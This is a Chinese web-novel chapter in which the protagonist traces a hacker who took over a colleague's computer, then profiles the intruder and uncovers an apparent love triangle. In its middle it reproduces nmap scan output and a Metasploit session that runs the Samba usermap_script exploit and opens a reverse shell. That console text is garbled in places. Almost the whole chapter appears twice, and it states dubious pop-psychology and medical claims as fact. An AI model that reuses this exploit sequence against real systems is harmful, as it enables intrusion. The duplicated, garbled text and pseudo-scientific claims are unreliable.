第62章 黑客的渗透测试
简单吃了点东西,拒绝了来自张昧影去公司游泳馆的邀请后,江澜护着电脑匆匆回来房间。
此刻他的内心有一个大胆的猜测,这个猜测可能与张凯明的某些话不谋而合。
电脑只要能通电就会说话,中了病毒的电脑不仅会说话,甚至还会rap。
也不知道还能不能再抢救抢救,抱着尝试一下的心理按下开机键。
说到黑客,就不得不提一款黑客必用的数字取证操作系统:kali linux。
但是擅长使用kali linux,并不能证明他就是一位出色的黑客,真正的顶尖黑客们,是在背后编写kali linux工具那批人。
攻击李洛甜电脑的病毒亦有异曲同工之妙,厉害点不在欺骗,而是在欺骗后精准地销毁与迷惑般留下线索。
没有虚拟机,江澜字号访问网址,输入js/uix-terminal,进入点击open terminal,立马提供了一个非常简单的终端环境。
“shell脚本有了。”
很快,便寻找道对方的漏洞攻击点,也就是病毒的入侵点。
继续查探到渗透工具nessus,江澜找到了对方留下来的线索。
nessus可以帮助操作者找到潜在攻击者利用到的漏洞,这个线索与被黑客抹去的其他操作痕迹有巨大差别。
也算是给江澜的挑衅,仿佛在说:“我来无影去无踪,在你面前秀完一手,你也只有看的份。”
张凯明不会这么嚣张,也不会无聊到认为李洛甜可以看明白这种暗示。
当然了,这名黑客对自己有着爆棚般的信心与技术,以至于忽略了雇主要求他做到不露声色的要求。
依照推理,这名黑客在攻击李洛甜的电脑时,大概率知道自己会插手这件事情,留下挑战信的他必定也知道自己的身份。
初步结论,对方依然是腾升内部技术人员。
在那个猜测面前,得出这个结论毫无意义,只有事实才能拨开迷雾。
很快江澜得知,这台电脑被盯上只是这两天的事情,仔细核对了下时间,是自己刚到腾升总部那天。
从那时候起,这台电脑便在李洛甜毫不知情的情况下被控制,信息被窃取,行为也受到了监控。
那时候的时间是上午11点42分,五人小队刚成立不多久。
与自己的猜测时间相吻合,这一切都是在自己进入马云腾视线后发生的,想到这里江澜有些毛骨悚然。
作为靶机,这台电脑有诸多漏洞,江澜先是使用nmap的扫描得出:
completed nse at 11:42,0.00s elapsed
initiating arp ping scan at 11:42
scanning target (192.168.122.102)[1 port]
completed arp ping scan at11:42,0.01s elapsed (1 total hosts)
initiating syn stealth scan at 11:42
scanning target (192.168.122.102)[65535 ports]
discovered open port 5900/tcp on 192.168.122.102
discovered open port 22/tcp on 192.168.122.102
discovered open port 25/tcp on 192.168.122.102
discovered open port 445/tcp on 192.168.122.102
discovered open port 21 /tcp on 192.168.122.102
discovered open port 3360/tcp on 192.168.122.102
discovered open port 23/tcp on 192.168.122.102
discovered open port 80tcp on 192.168.122.102
discovered open port 111/tcp on 192.168.122.102
discovered open port 139/tcp on 192.168.122.102
discovered open port 53/tcp on 192.168.122.102
discovered open port 8180/tcp on 192.168.122.102
discovered open port 3632/tcp on 192.168.122.102
discovered open port 2121/tcp on 192.168.122.102
discovered open port 6667/tcp on 192.168.122.102
discovered open port 6000/tcp on 192.168.122.102
discovered open port 5432/tcp on 192.168.122.102
而后使用metasploit:
:~# msfconsole
taking notes in notepad?have metasploit pro track & report
your progrss and findings -- learn more on htt.p
=[metasploit v4 .12.23-dev]
+----=[1577 exploits-907 auxiliary-272 post]
+----=[455 payloads-39 encoders-8 nops]
+----=[free metasploit pro trial :ht.tp//*******r-7.vo/trymsp]
msf>
.....
接下来,便取得对方的shell
exploit target
id--- name
the dark knight
msf exploit(usermap_script)>exploit
[*]started reverse tcp double handler on 192.168.122.101:666
[*]accepted the first client connection...
[*]accepted the secind client connection...
[*]command:echo 10oz6jj5y4taawy5
[*]writing to socket a
[*]writing to socket b
[*]reading from sockets...
[*]reading from sockets b
[*]b:“10oz6jj5y4taawy5/r/n”
[*]matching
[*]a is input...
[*]command shell session 1 opened(192.168.122.101:666->192.168.122.102:50823)at 2020-5-8 00:07:10-0500
这个漏洞实在是有点旧了,往前追溯可以到2005年,但它就是真实发生了。
对方的id为the dark knight,但这种行为可不像是蝙蝠侠干的事情。
当然江澜也不觉得对方会直接使用自己真实姓名的拼音缩写来作为id,层层剥丝,还真有点攻坚对战的意思。
想到上次追到一半电脑弹出的那几个红色大字,就知道这人不甘心只收钱做事,他喜欢挑战,更确切点来说,他靠击败别人激发身体的欢愉感,这种感觉比金钱更让他感到满足。
心理学上称这种行为为:马斯洛的需求层次。
这个心理学的经典理论适用于世界上任何一个人,基本内容是将人的需求从低到高一次分为:生理需求、安全需求、社交需求、尊重需求和自我实现需求。
对应黑客的行为,大多数是‘尊重需求’+‘自我实现需求’。
前者是要得到内在价值的肯定以及外在成就的认可,关键词是:成就、尊重、自信、自尊。
而后者‘自我实现需求’,则是在他充分发挥自己的能力后,实现理想抱负,关键词是:梦想、创造力、自发性、解决问题、能力。
通过简单的分析,这名黑客的心理画像便出来了。
“他很想证明自己,虽然行为乖张,却隐藏着一股自负,说明他曾经失败过,还是无法挽回的重大失误。”
“他需要击败一个强者,可在这种心理下却没有按照自己意想而任意妄为,说明幕后主使者对他拿捏有方。”
“从输入方式与某些点醒且频繁的小习惯上不难看出,他患有极度严重的强迫症。”
“id name 以蝙蝠侠外号the dark knight自居,行为上却对自己纯白无辜的同事下手,遇到破解者顿时兴奋,发出的警告词颇具挑逗,技术手段高超,还熟悉公司内部所有网络环境......”
“.....”
所有已知信息加在一起,江澜脑海中浮现出一个虚构的概念人物。
记忆再回到马云腾身上,时间回到办公室,那时候的张凯明高瘦,情绪极度不稳定,面带痤疮,这是典型的肝脏解毒功能减退,内分泌失调,程序员的通病。
更惹人注目的是,观察到他左手袖的纽扣线头松动,是曾经与硬物摩擦碰撞动过的痕迹。
碰巧马云腾的袖口纽扣亦是如此,残留的小半条断衣线明显来自张凯明。
看样子不是打架,更像是激烈的拥抱。
在张凯明刚进办公室与马云腾打招呼的时候,他右手捏成拳头,眼神充满敌意,说话时,有种不怕冒犯对方的感觉,说明两人有过私下之交,且来往密切。
而关于张凯明对公司的吐槽,就更加值得推敲。
与其说是他从业多年以来的积压爆发,不如说是他对自己与马云腾关系的暗讽发泄。
到这里,
江澜才发现故事的背后是场凄美的三角恋。
这样一来,所有问题都能够解释的通,起因不过是新欢与旧爱的交替使劲。
可...与自己又有什么关系?
还有比特币的交易与走向,马云腾是否真的不知情?
这几千万的背后,还有什么大的阴谋。
房间灯光橘黄通亮,就在江澜思绪乱飞时,背后门外走廊传来了脚步声......
此刻他的内心有一个大胆的猜测,这个猜测可能与张凯明的某些话不谋而合。
电脑只要能通电就会说话,中了病毒的电脑不仅会说话,甚至还会rap。
也不知道还能不能再抢救抢救,抱着尝试一下的心理按下开机键。
说到黑客,就不得不提一款黑客必用的数字取证操作系统:kali linux。
但是擅长使用kali linux,并不能证明他就是一位出色的黑客,真正的顶尖黑客们,是在背后编写kali linux工具那批人。
攻击李洛甜电脑的病毒亦有异曲同工之妙,厉害点不在欺骗,而是在欺骗后精准地销毁与迷惑般留下线索。
没有虚拟机,江澜字号访问网址,输入js/uix-terminal,进入点击open terminal,立马提供了一个非常简单的终端环境。
“shell脚本有了。”
很快,便寻找道对方的漏洞攻击点,也就是病毒的入侵点。
继续查探到渗透工具nessus,江澜找到了对方留下来的线索。
nessus可以帮助操作者找到潜在攻击者利用到的漏洞,这个线索与被黑客抹去的其他操作痕迹有巨大差别。
也算是给江澜的挑衅,仿佛在说:“我来无影去无踪,在你面前秀完一手,你也只有看的份。”
张凯明不会这么嚣张,也不会无聊到认为李洛甜可以看明白这种暗示。
当然了,这名黑客对自己有着爆棚般的信心与技术,以至于忽略了雇主要求他做到不露声色的要求。
依照推理,这名黑客在攻击李洛甜的电脑时,大概率知道自己会插手这件事情,留下挑战信的他必定也知道自己的身份。
初步结论,对方依然是腾升内部技术人员。
在那个猜测面前,得出这个结论毫无意义,只有事实才能拨开迷雾。
很快江澜得知,这台电脑被盯上只是这两天的事情,仔细核对了下时间,是自己刚到腾升总部那天。
从那时候起,这台电脑便在李洛甜毫不知情的情况下被控制,信息被窃取,行为也受到了监控。
那时候的时间是上午11点42分,五人小队刚成立不多久。
与自己的猜测时间相吻合,这一切都是在自己进入马云腾视线后发生的,想到这里江澜有些毛骨悚然。
作为靶机,这台电脑有诸多漏洞,江澜先是使用nmap的扫描得出:
completed nse at 11:42,0.00s elapsed
initiating arp ping scan at 11:42
scanning target (192.168.122.102)[1 port]
completed arp ping scan at11:42,0.01s elapsed (1 total hosts)
initiating syn stealth scan at 11:42
scanning target (192.168.122.102)[65535 ports]
discovered open port 5900/tcp on 192.168.122.102
discovered open port 22/tcp on 192.168.122.102
discovered open port 25/tcp on 192.168.122.102
discovered open port 445/tcp on 192.168.122.102
discovered open port 21 /tcp on 192.168.122.102
discovered open port 3360/tcp on 192.168.122.102
discovered open port 23/tcp on 192.168.122.102
discovered open port 80tcp on 192.168.122.102
discovered open port 111/tcp on 192.168.122.102
discovered open port 139/tcp on 192.168.122.102
discovered open port 53/tcp on 192.168.122.102
discovered open port 8180/tcp on 192.168.122.102
discovered open port 3632/tcp on 192.168.122.102
discovered open port 2121/tcp on 192.168.122.102
discovered open port 6667/tcp on 192.168.122.102
discovered open port 6000/tcp on 192.168.122.102
discovered open port 5432/tcp on 192.168.122.102
而后使用metasploit:
:~# msfconsole
taking notes in notepad?have metasploit pro track & report
your progrss and findings -- learn more on htt.p
=[metasploit v4 .12.23-dev]
+----=[1577 exploits-907 auxiliary-272 post]
+----=[455 payloads-39 encoders-8 nops]
+----=[free metasploit pro trial :ht.tp//*******r-7.vo/trymsp]
msf>
.....
接下来,便取得对方的shell
exploit target
id--- name
the dark knight
msf exploit(usermap_script)>exploit
[*]started reverse tcp double handler on 192.168.122.101:666
[*]accepted the first client connection...
[*]accepted the secind client connection...
[*]command:echo 10oz6jj5y4taawy5
[*]writing to socket a
[*]writing to socket b
[*]reading from sockets...
[*]reading from sockets b
[*]b:“10oz6jj5y4taawy5/r/n”
[*]matching
[*]a is input...
[*]command shell session 1 opened(192.168.122.101:666->192.168.122.102:50823)at 2020-5-8 00:07:10-0500
这个漏洞实在是有点旧了,往前追溯可以到2005年,但它就是真实发生了。
对方的id为the dark knight,但这种行为可不像是蝙蝠侠干的事情。
当然江澜也不觉得对方会直接使用自己真实姓名的拼音缩写来作为id,层层剥丝,还真有点攻坚对战的意思。
想到上次追到一半电脑弹出的那几个红色大字,就知道这人不甘心只收钱做事,他喜欢挑战,更确切点来说,他靠击败别人激发身体的欢愉感,这种感觉比金钱更让他感到满足。
心理学上称这种行为为:马斯洛的需求层次。
这个心理学的经典理论适用于世界上任何一个人,基本内容是将人的需求从低到高一次分为:生理需求、安全需求、社交需求、尊重需求和自我实现需求。
对应黑客的行为,大多数是‘尊重需求’+‘自我实现需求’。
前者是要得到内在价值的肯定以及外在成就的认可,关键词是:成就、尊重、自信、自尊。
而后者‘自我实现需求’,则是在他充分发挥自己的能力后,实现理想抱负,关键词是:梦想、创造力、自发性、解决问题、能力。
通过简单的分析,这名黑客的心理画像便出来了。
“他很想证明自己,虽然行为乖张,却隐藏着一股自负,说明他曾经失败过,还是无法挽回的重大失误。”
“他需要击败一个强者,可在这种心理下却没有按照自己意想而任意妄为,说明幕后主使者对他拿捏有方。”
“从输入方式与某些点醒且频繁的小习惯上不难看出,他患有极度严重的强迫症。”
“id name 以蝙蝠侠外号the dark knight自居,行为上却对自己纯白无辜的同事下手,遇到破解者顿时兴奋,发出的警告词颇具挑逗,技术手段高超,还熟悉公司内部所有网络环境......”
“.....”
所有已知信息加在一起,江澜脑海中浮现出一个虚构的概念人物。
记忆再回到马云腾身上,时间回到办公室,那时候的张凯明高瘦,情绪极度不稳定,面带痤疮,这是典型的肝脏解毒功能减退,内分泌失调,程序员的通病。
更惹人注目的是,观察到他左手袖的纽扣线头松动,是曾经与硬物摩擦碰撞动过的痕迹。
碰巧马云腾的袖口纽扣亦是如此,残留的小半条断衣线明显来自张凯明。
看样子不是打架,更像是激烈的拥抱。
在张凯明刚进办公室与马云腾打招呼的时候,他右手捏成拳头,眼神充满敌意,说话时,有种不怕冒犯对方的感觉,说明两人有过私下之交,且来往密切。
而关于张凯明对公司的吐槽,就更加值得推敲。
与其说是他从业多年以来的积压爆发,不如说是他对自己与马云腾关系的暗讽发泄。
到这里,
江澜才发现故事的背后是场凄美的三角恋。
这样一来,所有问题都能够解释的通,起因不过是新欢与旧爱的交替使劲。
可...与自己又有什么关系?
还有比特币的交易与走向,马云腾是否真的不知情?
这几千万的背后,还有什么大的阴谋。
房间灯光橘黄通亮,就在江澜思绪乱飞时,背后门外走廊传来了脚步声......